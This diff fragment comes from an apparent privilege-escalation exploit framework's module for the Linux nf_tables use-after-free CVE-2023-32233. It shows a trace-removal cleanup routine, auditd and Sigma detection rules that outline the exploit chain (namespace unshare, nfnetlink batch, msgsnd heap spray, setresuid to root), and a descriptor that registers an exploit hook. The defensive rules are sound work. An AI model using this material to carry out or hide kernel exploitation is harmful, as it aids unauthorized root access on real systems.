+    return IAMROOT_EXPLOIT_FAIL;
+#endif /* __linux__ */
+}
+
+/* ------------------------------------------------------------------
+ * Cleanup — best-effort breadcrumb removal
+ *
+ * Removes /tmp/iamroot-nft_set_uaf.log and nothing else; no message
+ * queues are drained here. Always returns IAMROOT_OK, including when
+ * unlink() fails.
+ * ------------------------------------------------------------------ */
+
+static iamroot_result_t nft_set_uaf_cleanup(const struct iamroot_ctx *ctx)
+{
+    (void)ctx;
+    /* Best-effort breadcrumb removal. We can't drain msg queues from a
+     * different process (they live in a private IPC namespace anyway,
+     * which exited with the child).
+     * NOTE(review): the --full-chain path has no child process, and
+     * what enter_unpriv_namespaces() unshares is not visible from here
+     * — confirm the namespace claim holds for that path too. */
+    if (unlink("/tmp/iamroot-nft_set_uaf.log") != 0 && errno != ENOENT) {
+        /* not fatal */
+    }
+    return IAMROOT_OK;
+}
+
+/* ------------------------------------------------------------------
+ * Embedded detection rules
+ *
+ * Two rule texts exposed through nft_set_uaf_module: auditd rules and a
+ * Sigma rule. Both are plain strings; nothing in this file parses them.
+ *
+ * NOTE(review), auditd text:
+ *   - `-S sendmsg -F a0!=0`: a0 is the first syscall argument, which
+ *     for sendmsg is the socket fd, so this only excludes fd 0 and does
+ *     not narrow the rule to NETLINK_NETFILTER traffic.
+ *   - only the unshare rule has an arch=b32 twin; the sendmsg, msgsnd
+ *     and setresuid rules are b64-only.
+ * ------------------------------------------------------------------ */
+
+static const char nft_set_uaf_auditd[] =
+    "# nft_set anonymous-set UAF (CVE-2023-32233) — auditd detection rules\n"
+    "# Flag unshare(CLONE_NEWUSER|CLONE_NEWNET) followed by nfnetlink\n"
+    "# transactions that mix NEWSET+DELSET in the same batch. Legitimate\n"
+    "# nft scripts rarely DELSET an anonymous set they just created;\n"
+    "# tune per env for firewalld/podman noise.\n"
+    "-a always,exit -F arch=b64 -S unshare -k iamroot-nft_set_uaf-userns\n"
+    "-a always,exit -F arch=b32 -S unshare -k iamroot-nft_set_uaf-userns\n"
+    "# Watch nfnetlink writes (the trigger batch goes via NETLINK_NETFILTER):\n"
+    "-a always,exit -F arch=b64 -S sendmsg -F a0!=0 -k iamroot-nft_set_uaf-nft\n"
+    "# msg_msg cross-cache groom: msgsnd bursts on multiple queues:\n"
+    "-a always,exit -F arch=b64 -S msgsnd -k iamroot-nft_set_uaf-msgsnd\n"
+    "# Canonical post-exploit primitives:\n"
+    "-a always,exit -F arch=b64 -S setresuid -F a0=0 -F a1=0 -F a2=0 -k iamroot-nft_set_uaf-priv\n";
+/*
+ * Sigma rule text for the same activity.
+ *
+ * NOTE(review):
+ *   - `id` is not a UUID; the Sigma specification expects one.
+ *   - the `uid_change` selection is defined but never referenced by
+ *     `condition`, so it has no effect on matching.
+ *   - `a0: 0x10000000` is an exact-value match; presumably meant as
+ *     CLONE_NEWUSER, it would not match a call that ORs in further
+ *     flags — TODO confirm against how the namespaces are entered.
+ *   - confirm the YAML nesting in the real file: selection fields must
+ *     be indented deeper than the selection names, and `condition`
+ *     must sit at the same level as the selections.
+ */
+static const char nft_set_uaf_sigma[] =
+    "title: Possible CVE-2023-32233 nft anonymous-set UAF exploitation\n"
+    "id: 23233e7c-iamroot-nft-set-uaf\n"
+    "status: experimental\n"
+    "description: |\n"
+    " Detects the canonical exploit shape for the nf_tables anonymous-set\n"
+    " use-after-free (Sondej/Krysiuk, May 2023): an unprivileged process\n"
+    " creates a user namespace + net namespace, then issues an nfnetlink\n"
+    " batch that creates and deletes an anonymous set in the same\n"
+    " transaction, followed by a msg_msg spray (msgsnd burst).\n"
+    " False positives: containers (podman/docker rootless), firewalld\n"
+    " ruleset reloads. Combine with process-tree: a previously-unpriv\n"
+    " process that suddenly has effective uid 0 is the smoking gun.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    " userns_clone:\n"
+    " type: 'SYSCALL'\n"
+    " syscall: 'unshare'\n"
+    " a0: 0x10000000\n"
+    " nft_writes:\n"
+    " type: 'SYSCALL'\n"
+    " syscall: 'sendmsg'\n"
+    " msg_spray:\n"
+    " type: 'SYSCALL'\n"
+    " syscall: 'msgsnd'\n"
+    " uid_change:\n"
+    " type: 'SYSCALL'\n"
+    " syscall: 'setresuid'\n"
+    " auid|expression: '!= 0'\n"
+    " condition: userns_clone and nft_writes and msg_spray\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.32233]\n";
+/*
+ * Module descriptor handed to iamroot_register(). No mitigate hook and
+ * no YARA / Falco rule text are provided (all NULL).
+ *
+ * NOTE(review): confirm the "fixed mainline 6.4-rc4" tag in
+ * kernel_range against the upstream fix commit.
+ */
+const struct iamroot_module nft_set_uaf_module = {
+    .name = "nft_set_uaf",
+    .cve = "CVE-2023-32233",
+    .summary = "nf_tables anonymous-set UAF (Sondej+Krysiuk) — primitive + groom",
+    .family = "nf_tables",
+    .kernel_range = "5.1 ≤ K, fixed mainline 6.4-rc4; backports: 6.3.2 / 6.2.15 / 6.1.28 / 5.15.111 / 5.10.180 / 5.4.243 / 4.19.283",
+    .detect = nft_set_uaf_detect,
+    .exploit = nft_set_uaf_exploit,
+    .mitigate = NULL, /* mitigation: upgrade kernel; OR set unprivileged_userns_clone=0 */
+    .cleanup = nft_set_uaf_cleanup,
+    .detect_auditd = nft_set_uaf_auditd,
+    .detect_sigma = nft_set_uaf_sigma,
+    .detect_yara = NULL,
+    .detect_falco = NULL,
+};
+/* Registers nft_set_uaf_module with the framework. */
+void iamroot_register_nft_set_uaf(void)
+{
+    iamroot_register(&nft_set_uaf_module);
+}